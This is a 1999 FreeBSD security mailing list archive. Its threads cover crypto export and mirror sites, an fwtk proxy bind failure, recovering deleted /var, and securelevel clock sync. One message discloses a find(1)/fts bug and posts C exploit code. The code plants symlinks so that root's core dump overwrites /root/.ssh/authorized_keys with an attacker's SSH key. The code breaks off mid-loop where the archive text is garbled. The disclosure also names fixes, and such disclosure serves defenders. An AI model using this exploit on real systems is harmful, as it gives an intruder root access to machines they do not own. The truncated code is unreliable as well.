Delivered-To: freebsd-security@freebsd.org
Received: from wall.polstra.com (rtrwan160.accessone.com [206.213.115.74]) by hub.freebsd.org (Postfix) with ESMTP id 5F8FA14D03 for ; Tue, 24 Aug 1999 09:15:44 -0700 (PDT) (envelope-from jdp@polstra.com)
Received: from vashon.polstra.com (vashon.polstra.com [206.213.73.13]) by wall.polstra.com (8.9.3/8.9.1) with ESMTP id IAA28822; Tue, 24 Aug 1999 08:29:58 -0700 (PDT) (envelope-from jdp@polstra.com)
Received: (from jdp@localhost) by vashon.polstra.com (8.9.3/8.9.1) id IAA77812; Tue, 24 Aug 1999 08:29:58 -0700 (PDT) (envelope-from jdp@polstra.com)
Message-ID:
X-Mailer: XFMail 1.3 [p0] on FreeBSD
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
In-Reply-To: <199908240831.JAA91459@keep.lan.Awfulhak.org>
Date: Tue, 24 Aug 1999 08:29:58 -0700 (PDT)
Organization: Polstra & Co., Inc.
From: John Polstra
To: Brian Somers
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
Cc: freebsd-security@FreeBSD.ORG, (Christopher Petrilli) , Darren Reed , "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Brian Somers wrote:
> jkh@zippy.cdrom.com said:
>> Bay Area region. We've already talked to our lawyer, he said it
>> looked legit to him, and so we've been shipping crypto on our CDs for
>> over a year now. I even announced it back then, to almost no audience
>> reaction whatsoever. It seems that people like to get more excited
>> about the prospect of something being closed than it being opened up.
>> :)
>
> Shouldn't etc/cvsup/ (from the cvsup-mirror port) be updated to
> reflect this ? I believe a lot of people don't know about the lack
> of restrictions in SF, and the fact that cvsup-mirror gets the crypto
> stuff from South Africa doesn't exactly drive the point home :-]

No, I don't think that change should be made. It could put the
individual mirror sites at legal risk. It's one thing for Walnut Creek
CD-ROM to decide to assume that risk themselves; quite another thing to
make it the default that would affect all the mirror sites. If somebody
in Europe fetches the crypto stuff from a mirror in, say, Massachusetts,
it's being exported from Massachusetts, not from the SF Bay Area where
it is supposedly OK.

John
---
  John Polstra                                               jdp@polstra.com
  John D. Polstra & Co., Inc.                        Seattle, Washington USA
  "No matter how cynical I get, I just can't keep up."        -- Nora Ephron

From owner-freebsd-security Tue Aug 24 15:12:37 1999
Delivered-To: freebsd-security@freebsd.org
Received: from yucca.daewoo.lublin.pl (yucca.daewoo.lublin.pl [195.205.71.11]) by hub.freebsd.org (Postfix) with ESMTP id 1046015277 for ; Tue, 24 Aug 1999 15:12:32 -0700 (PDT) (envelope-from raf@tb-303.org)
Received: from localhost (raf@localhost) by yucca.daewoo.lublin.pl (GetMail 1.2/sliffka0.3) with SMTP id AAA16146 for ; Wed, 25 Aug 1999 00:20:17 +0200 (CEST)
X-Authentication-Warning: yucca.daewoo.lublin.pl: raf owned process doing -bs
Date: Wed, 25 Aug 1999 00:20:17 +0200 (CEST)
From: Rafal Banaszkiewicz
X-Sender: raf@yucca.daewoo.lublin.pl
To: freebsd-security@freebsd.org
Subject: fts_print() , find and other stuff ?
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

What do you think about that ?
http://www.rootshell.com/archive-j457nxiqi3gq59dv/199906/freebsdover.txt

One of my friends has written sploit code for this bug ? It's an old bug ... and it's still not fixed .

/* Rafal Banaszkiewicz | mailto:raf@yucca.daewoo.lublin.pl , #lublin
   UIN : 35053919      | http://www.no-web.page.pl , [RaF] on IrcNet */

From owner-freebsd-security Wed Aug 25 0:10: 6 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mta2-rme.xtra.co.nz (mta2-rme.xtra.co.nz [203.96.92.3]) by hub.freebsd.org (Postfix) with ESMTP id DE287160F8 for ; Wed, 25 Aug 1999 00:09:44 -0700 (PDT) (envelope-from sdynamic@xtra.co.nz)
Received: from sdk6 ([210.55.151.189]) by mta2-rme.xtra.co.nz (InterMail v4.01.01.00 201-229-111) with SMTP id <19990825065946.ZSGM2478302.mta2-rme@sdk6>; Wed, 25 Aug 1999 18:59:46 +1200
Message-ID: <007501beeec6$e3de13f0$061ea8c0@sdk6.sd.co.nz>
From: "Michael Williams"
To: ,
Cc:
Subject: IPBind patch for fwtk on freeBSD 3.2
Date: Wed, 25 Aug 1999 18:55:59 +1200
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.3110.5
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Has anyone used the really cool fwtk IPBind patch for daemon mode plug-gw proxies with success on any of the FreeBSD OS versions?

I have found it to work exactly as expected under RedHat Linux 6.0 as per the syslog entries at the end of this mail.
The documentation clearly states,

    This patch has been tested and verified on the following systems:

    Solaris 2.5.1 (sparc)
    Solaris 2.5 (x86)

So I am not expecting too much as it does work on my test RedHat server, just not on the FreeBSD 3.2 server which happens to be the gateway I want to use this on (:

However, looking through the source code I can see that under FreeBSD it makes it through the create socket call, then the setsockopt call OK, but fails on the bind, seeming to not like the address. I am not sure how to figure out if the problem is an access rights issue or perhaps an address:port format issue.

A point worth noting is that when configured to bind the port only, then the bind is fine and in fact the proxy works as expected and when run in daemon mode sets up a listener on *.port for all interfaces.

I do have an IPFW rulebase loaded on the FreeBSD server which does not seem to interfere, as the plug-gw behaves fine when bound to port only.

Looking through my 4.4BSD books I can see that the bind call is quite happy to bind the address of 0/ and decide on the fly the correct interface, and this made me wonder if it wanted to bind to an interface address rather than an IP address?

I am starting the proxy with the following,

    /usr/local/etc/plug-gw -daemon 192.168.30.3:80 -name plug-http

Here are the syslog entries from both servers. Hope they come through legible.

redhat 6 linux 2.2.15-22 kernel.

    Aug 23 18:26:17 xmailgate plug-gw[615]: Starting daemon mode on ip 192.168.30.3(192.168.30.3), port 80
    .
    .
    Aug 25 05:10:54 xmailgate plug-gw[1139]: HERE!!! av[0] = 80
    Aug 25 05:10:54 xmailgate last message repeated 3 times
    Aug 25 05:10:54 xmailgate plug-gw[1139]: YO!!!
    localip = 192.168.30.3
    Aug 25 05:10:54 xmailgate plug-gw[1139]: connect host=sdakx0.xx.xx/192.168.30.10 destination=10.0.30.4/8080

freebsd 3.2 kernel

    Aug 24 06:13:19 sd172-lx52 plug-gw[1810]: Starting daemon mode on ip 172.16.30.4 (172.16.30.4), port 81
    Aug 24 06:13:19 sd172-lx52 plug-gw[1810]: Failed to bind port 81, Can't assign requested address

Any helpful comment would be appreciated.
Thanks,
Mike.

Michael Williams
Software Dynamics
mailto:sdynamic@xtra.co.nz
http://www.voyager.co.nz/~michaelw
cell ph: 025 995 914
ph: +64 9 2744876

From owner-freebsd-security Wed Aug 25 0:16:45 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.lublin.pl (mx1.lublin.pl [212.182.63.76]) by hub.freebsd.org (Postfix) with ESMTP id 4B89716D03 for ; Wed, 25 Aug 1999 00:14:25 -0700 (PDT) (envelope-from venglin@FreeBSD.lublin.pl)
Received: from lagoon.freebsd.lublin.pl ([212.182.117.180]:33547 "HELO lagoon.FreeBSD.lublin.pl") by krupik.man.lublin.pl with SMTP id ; Wed, 25 Aug 1999 09:13:54 +0200
Received: (qmail 91010 invoked by uid 66); 25 Aug 1999 07:16:24 -0000
Received: (qmail 18360 invoked from network); 25 Aug 1999 07:13:28 -0000
Received: from lagoon.gadaczka.org (HELO lagoon.gadaczka.FreeBSD.lublin.pl) (venglin@192.168.0.2) by mailhost.gadaczka.org with SMTP; 25 Aug 1999 07:13:28 -0000
Message-ID:
X-Mailer: XFMail 1.3 [p0] on Linux
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
MIME-Version: 1.0
In-Reply-To:
X-SMS: +48601383657@text.plusgsm.pl
X-PGP: PGP key on WWW or finger
X-Operating-System: FreeBSD 3.2-STABLE (i386)
Date: Wed, 25 Aug 1999 09:13:18 +0200 (CEST)
Organization: Lubelska Grupa Uzytkownikow BSD
From: Przemyslaw Frasunek
To: Rafal Banaszkiewicz
Subject: RE: fts_print() , find and other stuff ?
Cc: freebsd-security@freebsd.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 24-Aug-99 Rafal Banaszkiewicz wrote:
> One of my friends has written sploit code for this bug ? It's an old
> bug ... and it's still not fixed .

Yes, this bug is quite easy to exploit. Find(1) runs every day from the /etc/security script. It segfaults when the directory tree is _very_ long, because of a junk pointer to the directory name. The core is created in one of the directories from our tree. But if find.core already exists, it's overwritten. It's possible to create a symlink from e.g. master.passwd or something else to find.core, and this file will be overwritten. Sample code below.

BTW. Sorry for my poor English.

/* (c) 1999 babcia padlina ltd.

   bug in fts libc functions allows to overwrite any file in system,
   when running /etc/security script (executed from 'daily' scripts).

   affected systems:
   - freebsd (all versions)
   - probably openbsd/netbsd

   fix:
   - limit root's coredump size
   - patch libc
*/

#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

#define STRING  "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n"
#define FILE    "/root/.ssh/authorized_keys"
#define CORE    "find.core"
#define DEPTH   300
#define BUFSIZE 250

/* create one directory level, descend into it, and plant a symlink there
   that points the name of the expected core file at the target file */
int makedir(dir, linkfrom, linkto)
char *dir, *linkfrom, *linkto;
{
	if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
		return -1;
	if (chdir(dir))
		return -1;
	if (symlink(linkfrom, linkto) < 0)
		return -1;
	return 0;
}

int main(void)
{
	int i = 0;
	char pid[10], buf[BUFSIZE];

	/* top-level directory named after our pid, so several runs do not collide */
	sprintf(pid, "%d", getpid());

	if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO))) {
		perror("mkdir()");
		return -1;
	}

	if (chdir(pid)) {
		perror("chdir()");
		return -1;
	}

	/* one very long directory name component, repeated DEPTH times below */
	bzero(buf, BUFSIZE);
	memset(buf, 0x41, BUFSIZE-1);

	for(i=0;i

; Wed, 25 Aug 1999 00:55:31 -0700 (PDT) (envelope-from uldisk@kb.lkb.bkc.lv)
Received: from relay.lkb.bkc.lv (relay.lkb.lv [192.168.203.194]) by proxy.lkb.lv (8.9.1/8.9.1) with SMTP id KAA06919 for ; Wed, 25 Aug 1999 10:54:38 +0300 (EET DST)
Received:
from kb.lkb.bkc.lv by relay.lkb.bkc.lv with SMTP id AA11971 (5.65.kiae-1 for ); Wed, 25 Aug 1999 11:02:25 +0300
Received: from KB/SpoolDir by kb.lkb.bkc.lv (Mercury 1.21); 25 Aug 99 10:54:18 -200
Received: from SpoolDir by KB (Mercury 1.21); 25 Aug 99 10:54:15 -200
Received: from kb.lkb.bkc.lv by kb.lkb.bkc.lv (Mercury 1.21) with ESMTP; 25 Aug 99 10:54:11 -200
Message-Id: <37C3A13A.2A94EDFB@kb.lkb.bkc.lv>
Date: Wed, 25 Aug 1999 10:54:34 +0300
From: Uldis Kuplis
X-Mailer: Mozilla 4.6 [en] (WinNT; I)
X-Accept-Language: en
Mime-Version: 1.0
To: freebsd-security@FreeBSD.ORG
Subject: undelete
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

A user, who was admin and had the wheel group, deleted the /bin, /etc and /var directories from my FreeBSD 3.1.

Can I undelete these directories?
If it is possible, then how do I do it?

regards,
Uldis

From owner-freebsd-security Wed Aug 25 1:57:52 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mail.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id 79DA215B23 for ; Wed, 25 Aug 1999 01:57:32 -0700 (PDT) (envelope-from akm@mail.theinternet.com.au)
Received: (from akm@localhost) by mail.theinternet.com.au (8.9.3/8.9.3) id SAA81927; Wed, 25 Aug 1999 18:57:17 +1000 (EST) (envelope-from akm)
From: Andrew Kenneth Milton
Message-Id: <199908250857.SAA81927@mail.theinternet.com.au>
Subject: Re: undelete
In-Reply-To: <37C3A13A.2A94EDFB@kb.lkb.bkc.lv> from Uldis Kuplis at "Aug 25, 1999 10:54:34 am"
To: uldisk@kb.lkb.bkc.lv (Uldis Kuplis)
Date: Wed, 25 Aug 1999 18:57:17 +1000 (EST)
Cc: freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL43 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender:
owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

+----[ Uldis Kuplis ]---------------------------------------------
| A user, who was admin and had the wheel group,
| deleted the /bin, /etc and /var directories from my FreeBSD 3.1.
|
| Can I undelete these directories?
| If it is possible, then how do I do it?

Restore from your backup tape. :-)

--
Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew
The Internet (Aust) Pty Ltd          | F:+61 7 3870 4477 | Milton
ACN: 082 081 472                     | M:+61 416 022 411 |72 Col .Sig
PO Box 837 Indooroopilly QLD 4068    |akm@theinternet.com.au|Specialist

From owner-freebsd-security Wed Aug 25 2:39:34 1999
Delivered-To: freebsd-security@freebsd.org
Received: from proxy.lkb.lv (proxy.lkb.lv [195.13.170.2]) by hub.freebsd.org (Postfix) with ESMTP id B0071152C3 for ; Wed, 25 Aug 1999 02:39:27 -0700 (PDT) (envelope-from uldisk@kb.lkb.bkc.lv)
Received: from relay.lkb.bkc.lv (relay.lkb.lv [192.168.203.194]) by proxy.lkb.lv (8.9.1/8.9.1) with SMTP id MAA07831 for ; Wed, 25 Aug 1999 12:24:00 +0300 (EET DST)
Received: from kb.lkb.bkc.lv by relay.lkb.bkc.lv with SMTP id AA13348 (5.65.kiae-1 for ); Wed, 25 Aug 1999 12:31:47 +0300
Received: from KB/SpoolDir by kb.lkb.bkc.lv (Mercury 1.21); 25 Aug 99 12:23:40 -200
Received: from SpoolDir by KB (Mercury 1.21); 25 Aug 99 12:22:55 -200
Received: from kb.lkb.bkc.lv by kb.lkb.bkc.lv (Mercury 1.21) with ESMTP; 25 Aug 99 12:22:48 -200
Message-Id: <37C3B5FE.BF5D0296@kb.lkb.bkc.lv>
Date: Wed, 25 Aug 1999 12:23:10 +0300
From: Uldis Kuplis
X-Mailer: Mozilla 4.6 [en] (WinNT; I)
X-Accept-Language: en
Mime-Version: 1.0
To: freebsd-security@FreeBSD.ORG
Subject: Re: undelete
References: <199908250857.SAA81927@mail.theinternet.com.au>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Andrew
Kenneth Milton wrote:
>
> +----[ Uldis Kuplis ]---------------------------------------------
> | A user, who was admin and had the wheel group,
> | deleted the /bin, /etc and /var directories from my FreeBSD 3.1.
> |
> | Can I undelete these directories?
> | If it is possible, then how do I do it?
>
> Restore from your backup tape. :-)

Good joke :)
Because this system has no tapes.
I was admin for this sys only 2 days.
I need to undelete only /var ..

Linux has MC. That can undelete files from ext2fs.
Maybe FreeBSD also has MC with this feature?

Uldis

From owner-freebsd-security Wed Aug 25 3:15:24 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mail.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id 92600152EF for ; Wed, 25 Aug 1999 03:15:18 -0700 (PDT) (envelope-from akm@mail.theinternet.com.au)
Received: (from akm@localhost) by mail.theinternet.com.au (8.9.3/8.9.3) id UAA83465; Wed, 25 Aug 1999 20:12:54 +1000 (EST) (envelope-from akm)
From: Andrew Kenneth Milton
Message-Id: <199908251012.UAA83465@mail.theinternet.com.au>
Subject: Re: undelete
In-Reply-To: <37C3B5FE.BF5D0296@kb.lkb.bkc.lv> from Uldis Kuplis at "Aug 25, 1999 12:23:10 pm"
To: uldisk@kb.lkb.bkc.lv (Uldis Kuplis)
Date: Wed, 25 Aug 1999 20:12:54 +1000 (EST)
Cc: freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL43 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

+----[ Uldis Kuplis ]---------------------------------------------
|
|
| Andrew Kenneth Milton wrote:
| >
| > +----[ Uldis Kuplis ]---------------------------------------------
| > | A user, who was admin and had the wheel group,
| > | deleted the /bin, /etc and /var directories from my FreeBSD 3.1.
| > |
| > | Can I undelete these directories?
| > | If it is possible, then how do I do it?
| >
| > Restore from your backup tape. :-)
|
| Good joke :)
| Because this system has no tapes.
| I was admin for this sys only 2 days.
| I need to undelete only /var ..
|
| Linux has MC. That can undelete files from ext2fs.
| Maybe FreeBSD also has MC with this feature?

Midnight Commander is available from the ports tree:

    /usr/ports/misc/mc

I dunno if it can undelete though.

You should really have backups though (and better staff as well it seems) even if you have to backup across the network.

--
Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew
The Internet (Aust) Pty Ltd          | F:+61 7 3870 4477 | Milton
ACN: 082 081 472                     | M:+61 416 022 411 |72 Col .Sig
PO Box 837 Indooroopilly QLD 4068    |akm@theinternet.com.au|Specialist

From owner-freebsd-security Wed Aug 25 3:25:20 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mrelay.jrc.it (mrelay.jrc.it [139.191.1.65]) by hub.freebsd.org (Postfix) with ESMTP id 0CBD714EEB for ; Wed, 25 Aug 1999 03:25:16 -0700 (PDT) (envelope-from nick.hibma@jrc.it)
Received: from elect8 (elect8.jrc.it [139.191.71.152]) by mrelay.jrc.it (LMC5692) with SMTP id MAA25957; Wed, 25 Aug 1999 12:24:02 +0200 (MET DST)
Date: Wed, 25 Aug 1999 12:23:42 +0200 (MET DST)
From: Nick Hibma
X-Sender: n_hibma@elect8
Reply-To: Nick Hibma
To: Andrew Kenneth Milton
Cc: uldisk@kb.lkb.bkc.lv, freebsd-security@FreeBSD.ORG
Subject: Re: undelete
In-Reply-To: <199908251012.UAA83465@mail.theinternet.com.au>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Pretty sure that ufs does _not_ have undelete. The undelete feature in FAT is based on taking the name of the file you want to undelete, replacing the first character with 0x2d and trying whether the clusters are allocated or not.
In Windows it is simply based on moving the file out of the way instead of deleting it, and keeping track of where the file went. In ext2fs I guess it must be something similar. I know of no such mechanism in ufs. Also the words 'undelete' and 'recover' do not appear in the source of ufs, ffs, mfs.

So, you might be out of luck.

Below is the list of directories on that partition that you should have.

Nick

/var
/var/tmp
/var/tmp/vi.recover
/var/account
/var/at
/var/at/jobs
/var/at/spool
/var/backups
/var/crash
/var/cron
/var/cron/tabs
/var/db
/var/db/pkg
/var/log
/var/mail
/var/msgs
/var/preserve
/var/run
/var/rwho
/var/spool
/var/spool/lock
/var/spool/lpd
/var/spool/mqueue
/var/spool/output
/var/spool/output/lpd
/var/spool/uucp
/var/spool/uucp/.Preserve
/var/spool/uucp/.Sequence
/var/spool/uucp/.Status
/var/spool/uucp/.Temp
/var/spool/uucp/.Xqtdir
/var/spool/uucppublic
/var/spool/opielocks
/var/yp
/var/games
/var/games/hackdir
/var/games/hackdir/save
/var/games/larn
/var/games/phantasia
/var/adm
/var/adm/tcheck
/var/adm/tcheck/databases

> | Good joke :)
> | Because this system has no tapes.
> | I was admin for this sys only 2 days.
> | I need to undelete only /var ..
> |
> | Linux has MC. That can undelete files from ext2fs.
> | Maybe FreeBSD also has MC with this feature?
>
> Midnight Commander is available from the ports tree:
>
> /usr/ports/misc/mc
>
> I dunno if it can undelete though.
>
> You should really have backups though (and better staff as well it seems)
> even if you have to backup across the network.
>
> --
> Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew
> The Internet (Aust) Pty Ltd          | F:+61 7 3870 4477 | Milton
> ACN: 082 081 472                     | M:+61 416 022 411 |72 Col .Sig
> PO Box 837 Indooroopilly QLD 4068    |akm@theinternet.com.au|Specialist
>

--
ISIS/STA, T.P.270, Joint Research Centre, 21020 Ispra, Italy

From owner-freebsd-security Wed Aug 25 7:27: 5 1999
Delivered-To: freebsd-security@freebsd.org
Received: from connetsys.com (fw-01.connetsys.com [216.103.216.202]) by hub.freebsd.org (Postfix) with ESMTP id 4778C15A38 for ; Wed, 25 Aug 1999 07:26:42 -0700 (PDT) (envelope-from whamlin@connetsys.com)
Received: from fearless.connetsys.com (fw-mgmt-01 [10.0.2.10]) by connetsys.com (8.8.8/8.7.3) with ESMTP id HAA17579; Wed, 25 Aug 1999 07:25:43 -0700 (PDT)
Received: from mailhost (mailhost [10.0.1.40]) by fearless.connetsys.com (8.8.8/8.8.8) with SMTP id HAA23497; Wed, 25 Aug 1999 07:25:42 -0700 (PDT)
Date: Wed, 25 Aug 1999 07:25:42 -0700 (PDT)
From: "William L. Hamlin"
X-Sender: whamlin@fearless
To: Michael Williams
Cc: freebsd-security@freebsd.org, fwtk-users@lists.nai.com
Subject: Re: IPBind patch for fwtk on freeBSD 3.2
In-Reply-To: <007501beeec6$e3de13f0$061ea8c0@sdk6.sd.co.nz>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Michael,

Which version of IPBind are you using? If you are using anything older than 1.2, get the newest one - that will probably be your problem. There are known issues with earlier versions attempting to bind specific IP addresses on some systems.
My next suggestion would be to verify that the IP address you are specifying (172.16.30.4) is indeed the one that you want to use and that it is correctly configured on the local machine. I know this sounds basic, but most of the problem e-mails I get regarding the patch end up being this very problem. A good sign of a computer nut is that his eyes are almost completely blurry from working all night...

If that doesn't work, I'm at a bit of a loss. I don't have access to a FreeBSD machine right now and thus can't bang on it. However, if you (or anyone) has such a system on the Internet on which they can give me a temporary login (and gcc, of course), I can take a look and see for myself. Or maybe someone else has already gotten it working?

Actually, I've gotten very little response from people regarding the patch working on different operating systems. Since this is going out to the list, if any of you have gotten it working, could you please let me know what platform/OS and any changes you had to make?

- Bill

---
William L. Hamlin
Systems Architect
Convergent Networking Systems, Inc.

On Wed, 25 Aug 1999, Michael Williams wrote:

> [To be removed from this list send the message "unsubscribe fwtk-users" in the
> BODY of a mail message to majordomo@ex.tis.com.]
>
> Has anyone used the really cool fwtk IPBind patch for daemon mode plug-gw
> proxies with success on any of the FreeBSD OS versions?
>
> I have found it to work exactly as expected under RedHat Linux 6.0 as per
> the syslog entries at the end of this mail.
>
> The documentation clearly states,
> This patch has been tested and verified on the following systems:
>
> Solaris 2.5.1 (sparc)
> Solaris 2.5 (x86)
>
> So I am not expecting too much as it does work on my test RedHat server just
> not on the FreeBSD 3.2 server which happens to be the gateway I want to use
> this on (:
>
> However looking through the source code I can see that under FreeBSD it
> makes it through the create socket call, then the setsockopt call OK but
> fails on the bind seeming to not like the address.
> I am not sure how to figure out if the problem is an access rights issue or
> perhaps an address:port format issue.
>
> A point worth noting is that when configured to bind the port only, then
> the bind is fine and in fact the proxy works as expected and when run in
> daemon mode sets up a listener on *.port for all interfaces.
>
> I do have an IPFW rulebase loaded on the FreeBSD server which does not seem
> to interfere as the plug-gw behaves fine when bound to port only.
>
> Looking through my 4.4BSD books I can see that the bind call is quite happy
> to bind the address of 0/ and decide on the fly the correct interface and
> this made me wonder if it wanted to bind to an interface address rather than
> an IP address?
>
> I am starting the proxy with the following,
> /usr/local/etc/plug-gw -daemon 192.168.30.3:80 -name plug-http
>
> Here are the syslog entries from both servers.
> Hope they come through legible.
>
> redhat 6 linux 2.2.15-22 kernel.
> Aug 23 18:26:17 xmailgate plug-gw[615]: Starting daemon mode on ip
> 192.168.30.3(192.168.30.3), port 80
> .
> .
> Aug 25 05:10:54 xmailgate plug-gw[1139]: HERE!!! av[0] = 80
> Aug 25 05:10:54 xmailgate last message repeated 3 times
> Aug 25 05:10:54 xmailgate plug-gw[1139]: YO!!!
> localip = 192.168.30.3
> Aug 25 05:10:54 xmailgate plug-gw[1139]: connect
> host=sdakx0.xx.xx/192.168.30.10 destination=10.0.30.4/8080
>
>
> freebsd 3.2 kernel
> Aug 24 06:13:19 sd172-lx52 plug-gw[1810]: Starting daemon mode on ip
> 172.16.30.4
> (172.16.30.4), port 81
> Aug 24 06:13:19 sd172-lx52 plug-gw[1810]: Failed to bind port 81, Can't
> assign requested address
>
> Any helpful comment would be appreciated.
> Thanks,
> Mike.
>
> Michael Williams
> Software Dynamics
> mailto:sdynamic@xtra.co.nz
> http://www.voyager.co.nz/~michaelw
> cell ph: 025 995 914
> ph: +64 9 2744876
>

From owner-freebsd-security Wed Aug 25 9:17:17 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mail.vr.IN-Berlin.DE (gnu.in-berlin.de [192.109.42.4]) by hub.freebsd.org (Postfix) with ESMTP id D073E15099 for ; Wed, 25 Aug 1999 09:16:43 -0700 (PDT) (envelope-from server.nostromo.in-berlin.de!ripley@servicia.in-berlin.de)
Received: from uriela.in-berlin.de (IDENT:root@servicia.in-berlin.de [192.109.42.145]) by mail.vr.IN-Berlin.DE (8.9.3/8.9.3) with ESMTP id SAA23794 for ; Wed, 25 Aug 1999 18:15:27 +0200 (CEST) (envelope-from server.nostromo.in-berlin.de!ripley@servicia.in-berlin.de)
Received: by uriela.in-berlin.de (Smail-3.2.0.101 1997-Dec-17 #1) id m11JgBN-000VQyC; Wed, 25 Aug 1999 18:45:53 +0200 (CEST)
Received: (from ripley@localhost) by server.nostromo.in-berlin.de (8.9.3/8.9.3) id XAA72728 for freebsd-security@FreeBSD.ORG; Tue, 24 Aug 1999 23:59:09 +0200 (CEST) (envelope-from ripley)
Date: Tue, 24 Aug 1999 23:59:08 +0200
From: "H.
Eckert"
To: freebsd-security@FreeBSD.ORG
Subject: Re: Securelevel 3 and setting time
Message-ID: <19990824235908.B70739@server.nostromo.in-berlin.de>
References: <19990822112923.6666.qmail@alice.gba.oz.au> <19990822194140.623D211@woodstock.monkey.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.6i
X-Old-Subject: Re: Securelevel 3 ant setting time
In-Reply-To: <19990822194140.623D211@woodstock.monkey.net>; from Jon Hamilton on Sun, Aug 22, 1999 at 02:41:40PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Quoting Jon Hamilton (hamilton@pobox.com):
> - some people don't care about "the" correct time, as long as their
>   machines all agree about what they _think_ the time is (e.g. to keep
>   NFS happy on an internal network)

Additionally it depends quite a lot on how correct you want to be. For most home users (that is, those people who are not permanently connected to the net) it is absolutely sufficient to have one local time master that all other machines sync themselves to (hey, a lot of people may even have only one machine at all ;-) and that syncs to the correct time once in a while when it's connected to the net. This is what I do (my server's running xntpd on behalf of the other machines and updates its clock during the daily poll for mail) and it's what the fellow does who started this whole thread in the first place. The only problem being he put his server into an elevated secure level and synchronized the clock rarely enough to drift too far away to be corrected at that secure level in one step.

Now, anybody who's got a real reason to keep their time more accurate than that should be obliged to invest in that accuracy. Either by providing a different source for "the" time or by configuring the machine to take care of it by synching itself more often. Radio synched clocks to be connected to a serial port aren't expensive.
Activating the network connection once or twice an hour instead of once a day isn't that expensive either. You get what you pay for and YMMV.

The main question we haven't come to a conclusion so far is what action should(n't) be taken as a possible solution for the "rarely synched clock in an elevated secure level" scenario.

- Loosen security and allow for bigger time jumps ?
- Forcing the admin to sync the clock more often ?
- Enabling ntpdate to distribute the time adjustments into several smaller jumps instead of a big leap ?

Greetings,
Ripley

From owner-freebsd-security Wed Aug 25 13:48:32 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mta2-rme.xtra.co.nz (mta2-rme.xtra.co.nz [203.96.92.3]) by hub.freebsd.org (Postfix) with ESMTP id 574A614CFF for ; Wed, 25 Aug 1999 13:48:24 -0700 (PDT) (envelope-from sdynamic@xtra.co.nz)
Received: from sdk6 ([210.55.122.60]) by mta2-rme.xtra.co.nz (InterMail v4.01.01.00 201-229-111) with SMTP id <19990825205024.FLHK2478302.mta2-rme@sdk6>; Thu, 26 Aug 1999 08:50:24 +1200
Message-ID: <004a01beef3a$ed56c160$061ea8c0@sdk6.sd.co.nz>
From: "Michael Williams"
To: "William L. Hamlin"
Cc: ,
Subject: Re: IPBind patch for fwtk on freeBSD 3.2
Date: Thu, 26 Aug 1999 08:46:36 +1200
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.3110.5
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Bill,

Thanks for your quick response. Sorry for my slow reply.. NZ time is way different.
If socket programming is bordering off correct topic for freebsd-security perhaps one of the freeBSD team could let me know, in which case we could post the resolution only to freebsd-security :)

>
> Which version of IPBind are you using? If you are using anything older
